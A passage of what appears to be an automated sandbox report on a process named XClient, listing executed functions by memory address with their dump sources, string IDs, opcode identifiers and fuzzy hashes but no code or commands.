                                                              • Opcode ID: 6d4f949e07f588142c8c622e9980c5bdf954d76d00022984e6c4559589dafb2a
                                                              • Instruction ID: cda5e3a196d91071d08c3f0fe695b6bc51816bffd3854f631376da43e8a9904d
                                                              • Opcode Fuzzy Hash: 6d4f949e07f588142c8c622e9980c5bdf954d76d00022984e6c4559589dafb2a
                                                              • Instruction Fuzzy Hash: F7F03074954325CFDB24EF74C258B9D7BF0AF08708F255898D806AB260DBB49C84CB60
                                                              Function 02E508A8 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c85537dd0c5a3ddc3ab085ef974df1a4de1364c852d15a2509056c968fc7bf8d
                                                              • Instruction ID: 435e42a2738f284ca8e84005de2074441938a86703c42fd958802d697ae3b332
                                                              • Opcode Fuzzy Hash: c85537dd0c5a3ddc3ab085ef974df1a4de1364c852d15a2509056c968fc7bf8d
                                                              • Instruction Fuzzy Hash: 4CD017B1D01229AF8B40EFB899051DEBBF8EE08250F004566D909E3200F2705A10CBD1

                                                              Executed Functions

                                                              Function 02B21230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: 4dbfe2aa88dd2b2df806507510903a048286bd27a4a45c2b6823078a1e42db6f
                                                              • Instruction ID: a0636ea1b4b0baabe7de39d4a4dd09fca3d8d590a5ddee21c7f13153f78ba675
                                                              • Opcode Fuzzy Hash: 4dbfe2aa88dd2b2df806507510903a048286bd27a4a45c2b6823078a1e42db6f
                                                              • Instruction Fuzzy Hash: 8B3126757416108FCB69AB38C55882D7BF2EF8A71536508B9E406CF3B6DA35DC42CB80
                                                              Function 02B21240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: ec13e0010811d36874c6d784a14a68caf24647ac466af8e188c08f786b4cbacf
                                                              • Instruction ID: 7b850422ed6134ba698cd8253b6d7ab1b5b8924e404f1039efdd7fed22b3e706
                                                              • Opcode Fuzzy Hash: ec13e0010811d36874c6d784a14a68caf24647ac466af8e188c08f786b4cbacf
                                                              • Instruction Fuzzy Hash: 5B2105357406208FCB59AB39C59881D7BF6EF8971536508B8E906CF375DA36EC42CB80
                                                              Function 02B21AE0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8nq
                                                              • API String ID: 0-2810462305
                                                              • Opcode ID: e2d06ea89369d28c53b0378153dc73a0015c786ab0cc6a90afa38b5fd355b041
                                                              • Instruction ID: e764e1d7b1b7b6c998fccc5199bff8e4a313f38db1859481fcf2d5ee7f3146df
                                                              • Opcode Fuzzy Hash: e2d06ea89369d28c53b0378153dc73a0015c786ab0cc6a90afa38b5fd355b041
                                                              • Instruction Fuzzy Hash: 4111B135A002045FC758EF7CA454BED3BBAEF85300F5040A8C5099B395EF349D16CB94
                                                              Function 02B21340 Relevance: .5, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 064d78b1080f5b3bdbe52be9e7412fcc14ea3d4e5684d5b9e6f5091c7023ae69
                                                              • Instruction ID: 8286bac8aeccbc597826cbb2c28d950168670a35d48c5ff7477e946b06e2dda7
                                                              • Opcode Fuzzy Hash: 064d78b1080f5b3bdbe52be9e7412fcc14ea3d4e5684d5b9e6f5091c7023ae69
                                                              • Instruction Fuzzy Hash: 36224C35B14312CFCB24EF78E59462A77B2FB84304B54896CD45A8B39AEB35EC45CB50
                                                              Function 02B20BC0 Relevance: .3, Instructions: 338COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edf42a586eb15c445da19034774e9fa0548274128334a95d8b3f4c11754a078a
                                                              • Instruction ID: cf06a0aea3dd66c7dfbf035981222908aaf388c2b80c73bde0bc07739fcc1191
                                                              • Opcode Fuzzy Hash: edf42a586eb15c445da19034774e9fa0548274128334a95d8b3f4c11754a078a
                                                              • Instruction Fuzzy Hash: B881C235A04355CFCB25AF74D5186AEBBB2EF88300F1889A9D40A57369DF75EC89CB40
                                                              Function 02B21C00 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25b8910cc10111cc2f5581fd34a322a3cd2fd2f705c78489ac906708d0217049
                                                              • Instruction ID: fb10a1e2ce321c2e2ca029160529af2d3e05333e6afba4dcb6a4918321c540c2
                                                              • Opcode Fuzzy Hash: 25b8910cc10111cc2f5581fd34a322a3cd2fd2f705c78489ac906708d0217049
                                                              • Instruction Fuzzy Hash: 4911CE7AE002058FCB40EFB8D8458AFFBB1FF8A30071085AAE41997225E7309815CF90
                                                              Function 02B21C10 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24d09f57441700df5e28b50ab61715e11278c77a5275cc031ea6ba0d02908124
                                                              • Instruction ID: 76fb204e7095007fc1fff9250f750373d26ae53a4fea827f73b61cb02b7dd135
                                                              • Opcode Fuzzy Hash: 24d09f57441700df5e28b50ab61715e11278c77a5275cc031ea6ba0d02908124
                                                              • Instruction Fuzzy Hash: 73019E7AE002059FCB44EFB8D8448ABFBF5FF89300710866AE51997325E730A915CF90
                                                              Function 02B20898 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7fc61333586237e396b750271967ca1da587b38fc630ab6a07949e1df59b4eac
                                                              • Instruction ID: 1d8541a5b95d10ee41e469bdf8664012671ed12cf9a1b9292785165a63b498ff
                                                              • Opcode Fuzzy Hash: 7fc61333586237e396b750271967ca1da587b38fc630ab6a07949e1df59b4eac
                                                              • Instruction Fuzzy Hash: BBE09B75D05354AFCF50EF7864051EF7BF0AE45200F0045BAC45AD3201E2708605CB91
                                                              Function 02B20F9D Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa9c8c8a5e1ffa3d0ce3b0370db9fece9e91f6bbb3087e9db81aad367f8e380f
                                                              • Instruction ID: 64d810f67905501ec162630a1d9cef9c008c893b885e2ed1fca8c7be97976c3f
                                                              • Opcode Fuzzy Hash: fa9c8c8a5e1ffa3d0ce3b0370db9fece9e91f6bbb3087e9db81aad367f8e380f
                                                              • Instruction Fuzzy Hash: DDF01C74944365CFDB24EB78C25C79D7BB0AB08705F1408A8D40AA7261DBB48888CB51
                                                              Function 02B208A8 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001A.00000002.3872803777.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_26_2_2b20000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26153b63c6ecfa718f8b518218d81aacb04e5493858bcd510190595fc2d8b5e0
                                                              • Instruction ID: f60ff428e3e4534baf6b28c6e2e12025b8fba6481327bc16954f2f76f4c4a4c3
                                                              • Opcode Fuzzy Hash: 26153b63c6ecfa718f8b518218d81aacb04e5493858bcd510190595fc2d8b5e0
                                                              • Instruction Fuzzy Hash: 8ED01271D01219AF8B40EFB899051DEBBF4EE08250B1005A5D909E3200E2705A10CBD1